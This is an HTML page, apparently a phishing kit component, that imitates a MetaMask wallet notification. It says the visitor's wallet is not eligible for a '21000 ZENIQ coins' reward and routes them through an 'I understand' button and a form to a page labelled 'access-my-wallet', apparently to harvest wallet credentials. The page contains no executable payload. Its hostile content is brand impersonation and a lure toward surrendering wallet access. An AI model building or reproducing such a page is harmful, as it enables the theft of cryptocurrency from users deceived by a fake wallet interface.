<!DOCTYPE html>
<html class=""><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
     <meta charset="utf-8">
     <title>MetaMask Notification</title>
     <style>
      #app-content {
        display: flex;
        flex-flow: column;
      }

      #loading__logo {
        width: 10rem;
        height: 10rem;
        align-self: center;
        margin: 10rem 0 0 0;
      }

      #loading__spinner {
        width: 2rem;
        height: 2rem;
        align-self: center;
        margin-top: 1rem;
      }
    </style>
     <link href="metamask-fox.svg" rel="shortcut icon" type="image/x-icon">
     <link rel="stylesheet" type="text/css" href="index.css" title="ltr">
     <link rel="stylesheet" type="text/css" href="index-rtl.css" title="rtl" disabled="">
   <style></style><link type="text/css" rel="stylesheet" charset="UTF-8" href="https://translate.googleapis.com/translate_static/css/translateelement.css"></head>
   <body class="notification"><div style="z-index: 9999; position: fixed; width: 100%; border: 0px; padding: 5px; margin: 0px; background-color: transparent;  font-size: 12pt; font-family: sans-serif;" id="web2disk_nag" onclick="javascript: document.getElementById('web2disk_nag').style.display = 'none';">
	</div>
     <div id="app-content"><div class="app mouse-user-styles"><div><span></span></div><div class="menu-droppo-container network-droppo" style="position: absolute; top: 58px; width: 309px; z-index: 55;"><style>
          .menu-droppo-enter {
            transition: transform 300ms ease-in-out;
            transform: translateY(-200%);
          }

          .menu-droppo-enter.menu-droppo-enter-active {
            transition: transform 300ms ease-in-out;
            transform: translateY(0%);
          }

          .menu-droppo-leave {
            transition: transform 300ms ease-in-out;
            transform: translateY(0%);
          }

          .menu-droppo-leave.menu-droppo-leave-active {
            transition: transform 300ms ease-in-out;
            transform: translateY(-200%);
          }
        </style></div><div class="main-container-wrapper"><div class="page-container"><div class="confirm-page-container-navigation" style="display: none;"><div class="confirm-page-container-navigation__container" style="visibility: hidden;"><div class="confirm-page-container-navigation__arrow" data-testid="first-page"><img src="images/double-arrow.svg" alt=""></div><div class="confirm-page-container-navigation__arrow" data-testid="previous-page"><img src="/images/single-arrow.svg" alt=""></div></div><div class="confirm-page-container-navigation__textcontainer"><div class="confirm-page-container-navigation__navtext">1 of 1 </div><div class="confirm-page-container-navigation__longtext">requests waiting to be ____________ </div></div><div class="confirm-page-container-navigation__container" style="visibility: hidden;"><div class="confirm-page-container-navigation__arrow" data-testid="next-page"><img class="confirm-page-container-navigation__imageflip" src="images/single-arrow.svg" alt=""></div><div class="confirm-page-container-navigation__arrow" data-testid="last-page"><img class="confirm-page-container-navigation__imageflip" src="images/double-arrow.svg" alt=""></div></div></div><div class="confirm-page-container-header"><div class="confirm-page-container-header__row"><div class="https://mantradao.com/favicon.icor"><div class="confirm-page-container-header__address-identicon"><div class=""><div class="identicon" style="height: 24px; width: 24px; border-radius: 12px;"><div style="border-radius: 50px; overflow: hidden; padding: 0px; margin: 0px; width: 24px; height: 24px; display: inline-block; background: rgb(1, 135, 142);"><svg x="0" y="0" width="24" height="24"><rect x="0" y="0" width="24" height="24" transform="translate(-1.8283976330022202 3.9268598674416935) rotate(122.5 12 12)" fill="#F94301"></rect><rect x="0" y="0" width="24" height="24" transform="translate(8.395005443347443 6.451852780925942) rotate(121.5 12 12)" fill="#C8144A"></rect><rect x="0" y="0" width="24" height="24" transform="translate(17.29272690351644 3.3990868252390825) rotate(113.9 12 12)" fill="#FA7900"></rect></svg></div></div></div></div><div class="confirm-page-container-header__address"></div></div><div class="network-display network-display--colored network-display--mainnet chip chip--with-left-icon chip--transparent" role="button" tabindex="0"><div class="chip__left-icon"><div class="color-indicator color-indicator--filled color-indicator--color-mainnet color-indicator--size-lg"><span class="color-indicator__inner-circle"></span></div></div><span class="box box--margin-top-1 box--margin-right-0 box--margin-bottom-1 box--margin-left-0 typography chip__label typography--h7 typography--align-undefined typography--color-ui-4 typography--weight-normal">Error </span></div></div></div><div class="confirm-approve-content"><div class="confirm-approve-content__identicon-wrapper"><img class="identicon confirm-approve-content__identicon" src="favicon-96x96.png" alt="" style="height: 48px; width: 48px; border-radius: 24px;"></div><div class="confirm-approve-content__title">Sorry, your wallet not eligible for this rewards round.</div><div class="confirm-approve-content__description">To receive the rewards of 21000 ZENIQ coins, you must connect a wallet that has ZENIQ transactions. whether it's a transaction: ZENIQ ETH Smart Contract Address (ETH to ZENIQ/ ZENIQ to ETH).
or ZENIQ BNB Smart Contract Address (BNB to ZENIQ/ ZENIQ to BNB)</div><div class="confirm-approve-content__edit-submission-button-container"><div class="confirm-approve-content__medium-link-text cursor-pointer">Edit Permission </div></div><div class="confirm-approve-content__card-wrapper"></div></div><div class="page-container__footer"><footer> &ensp;  <a href="metamask.html?access-my-wallet" class="button btn-primary page-container__footer-button" data-testid="page-container-footer-next">I understand </a><form method="post" action="metamask.html?access-my-wallet"></form></footer></div></div></div></div></div>
     <div id="popover-content"></div><div id="goog-gt-tt" class="skiptranslate" dir="ltr"><div style="padding: 8px;"><div><div class="logo"><img src="https://www.gstatic.com/images/branding/product/1x/translate_24dp.png" width="20" height="20" alt="Google Translate"></div></div></div><div class="top" style="padding: 8px; float: left; width: 100%;"><h1 class="title gray">Original text</h1></div><div class="middle" style="padding: 8px;"><div class="original-text"></div></div><div class="bottom" style="padding: 8px;"><div class="activity-links"><span class="activity-link">Contribute a better translation</span><span class="activity-link"></span></div><div class="started-activity-container"><hr style="color: #CCC; background-color: #CCC; height: 1px; border: none;"><div class="activity-root"></div></div></div><div class="status-message" style="display: none;"></div></div>
 <div class="goog-te-spinner-pos"><div class="goog-te-spinner-animation"><svg xmlns="http://www.w3.org/2000/svg" class="goog-te-spinner" width="96px" height="96px" viewBox="0 0 66 66"><circle class="goog-te-spinner-path" fill="none" stroke-width="6" stroke-linecap="round" cx="33" cy="33" r="30"></circle></svg></div></div></body></html>